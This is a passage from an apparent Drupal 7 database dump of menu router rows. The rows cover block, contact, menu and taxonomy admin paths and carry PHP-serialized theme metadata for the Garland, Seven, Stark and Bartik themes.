(main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:7:\"garland\";}','',31,5,0,'','admin/structure/block/demo/garland','Garland','t','','_block_custom_theme','a:1:{i:0;s:7:\"garland\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/seven','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:5:\"seven\";}','',31,5,0,'','admin/structure/block/demo/seven','Seven','t','','_block_custom_theme','a:1:{i:0;s:5:\"seven\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/stark','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:5:\"stark\";}','',31,5,0,'','admin/structure/block/demo/stark','Stark','t','','_block_custom_theme','a:1:{i:0;s:5:\"stark\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/bartik','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:6:\"bartik\";}','',31,5,1,'admin/structure/block','admin/structure/block','Bartik','t','','','a:0:{}',140,'','',-10,'modules/block/block.admin.inc'),('admin/structure/block/list/garland','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:7:\"garland\";}','',31,5,1,'admin/structure/block','admin/structure/block','Garland','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/garland/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/garland','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/seven','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:5:\"seven\";}','',31,5,1,'admin/structure/block','admin/structure/block','Seven','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/seven/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/seven','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/stark','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:5:\"stark\";}','',31,5,1,'admin/structure/block','admin/structure/block','Stark','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/stark/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/stark','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/manage/%/%','a:2:{i:4;N;i:5;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}','',60,6,0,'','admin/structure/block/manage/%/%','Configure block','t','','','a:0:{}',6,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/manage/%/%/configure','a:2:{i:4;N;i:5;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}','',121,7,2,'admin/structure/block/manage/%/%','admin/structure/block/manage/%/%','Configure block','t','','','a:0:{}',140,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/manage/%/%/delete','a:2:{i:4;N;i:5;N;}','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:3:{i:0;s:25:\"block_custom_block_delete\";i:1;i:4;i:2;i:5;}','',121,7,0,'admin/structure/block/manage/%/%','admin/structure/block/manage/%/%','Delete block','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/contact','','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','contact_category_list','a:0:{}','',7,3,0,'','admin/structure/contact','Contact form','t','','','a:0:{}',6,'Create a system contact form and set up categories for the form to use.','',0,'modules/contact/contact.admin.inc'),('admin/structure/contact/add','','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','drupal_get_form','a:1:{i:0;s:26:\"contact_category_edit_form\";}','',15,4,1,'admin/structure/contact','admin/structure/contact','Add category','t','','','a:0:{}',388,'','',1,'modules/contact/contact.admin.inc'),('admin/structure/contact/delete/%','a:1:{i:4;s:12:\"contact_load\";}','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','drupal_get_form','a:2:{i:0;s:28:\"contact_category_delete_form\";i:1;i:4;}','',30,5,0,'','admin/structure/contact/delete/%','Delete contact','t','','','a:0:{}',6,'','',0,'modules/contact/contact.admin.inc'),('admin/structure/contact/edit/%','a:1:{i:4;s:12:\"contact_load\";}','','user_access','a:1:{i:0;s:24:\"administer contact forms\";}','drupal_get_form','a:2:{i:0;s:26:\"contact_category_edit_form\";i:1;i:4;}','',30,5,0,'','admin/structure/contact/edit/%','Edit contact category','t','','','a:0:{}',6,'','',0,'modules/contact/contact.admin.inc'),('admin/structure/menu','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_overview_page','a:0:{}','',7,3,0,'','admin/structure/menu','Menus','t','','','a:0:{}',6,'Add new menus to your site, edit existing menus, and rename and reorganize menu links.','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/add','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:14:\"menu_edit_menu\";i:1;s:3:\"add\";}','',15,4,1,'admin/structure/menu','admin/structure/menu','Add menu','t','','','a:0:{}',388,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/item/%/delete','a:1:{i:4;s:14:\"menu_link_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_item_delete_page','a:1:{i:0;i:4;}','',61,6,0,'','admin/structure/menu/item/%/delete','Delete menu link','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/item/%/edit','a:1:{i:4;s:14:\"menu_link_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:4:{i:0;s:14:\"menu_edit_item\";i:1;s:4:\"edit\";i:2;i:4;i:3;N;}','',61,6,0,'','admin/structure/menu/item/%/edit','Edit menu link','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/item/%/reset','a:1:{i:4;s:14:\"menu_link_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:23:\"menu_reset_item_confirm\";i:1;i:4;}','',61,6,0,'','admin/structure/menu/item/%/reset','Reset menu link','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/list','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_overview_page','a:0:{}','',15,4,1,'admin/structure/menu','admin/structure/menu','List menus','t','','','a:0:{}',140,'','',-10,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}','',30,5,0,'','admin/structure/menu/manage/%','Customize menu','menu_overview_title','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/add','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:4:{i:0;s:14:\"menu_edit_item\";i:1;s:3:\"add\";i:2;N;i:3;i:4;}','',61,6,1,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','Add link','t','','','a:0:{}',388,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/delete','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_delete_menu_page','a:1:{i:0;i:4;}','',61,6,0,'','admin/structure/menu/manage/%/delete','Delete menu','t','','','a:0:{}',6,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/edit','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:3:{i:0;s:14:\"menu_edit_menu\";i:1;s:4:\"edit\";i:2;i:4;}','',61,6,3,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','Edit menu','t','','','a:0:{}',132,'','',0,'modules/menu/menu.admin.inc'),('admin/structure/menu/manage/%/list','a:1:{i:4;s:9:\"menu_load\";}','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:2:{i:0;s:18:\"menu_overview_form\";i:1;i:4;}','',61,6,3,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','List links','t','','','a:0:{}',140,'','',-10,'modules/menu/menu.admin.inc'),('admin/structure/menu/parents','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','menu_parent_options_js','a:0:{}','',15,4,0,'','admin/structure/menu/parents','Parent menu items','t','','','a:0:{}',0,'','',0,''),('admin/structure/menu/settings','','','user_access','a:1:{i:0;s:15:\"administer menu\";}','drupal_get_form','a:1:{i:0;s:14:\"menu_configure\";}','',15,4,1,'admin/structure/menu','admin/structure/menu','Settings','t','','','a:0:{}',132,'','',5,'modules/menu/menu.admin.inc'),('admin/structure/taxonomy','','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}','',7,3,0,'','admin/structure/taxonomy','Taxonomy','t','','','a:0:{}',6,'Manage tagging, categorization, and classification of your content.','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:23:\"taxonomy_overview_terms\";i:1;i:3;}','',14,4,0,'','admin/structure/taxonomy/%','','entity_label','a:2:{i:0;s:19:\"taxonomy_vocabulary\";i:1;i:3;}','','a:0:{}',6,'','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%/add','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:3:{i:0;s:18:\"taxonomy_form_term\";i:1;a:0:{}i:2;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Add term','t','','','a:0:{}',388,'','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%/display','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer 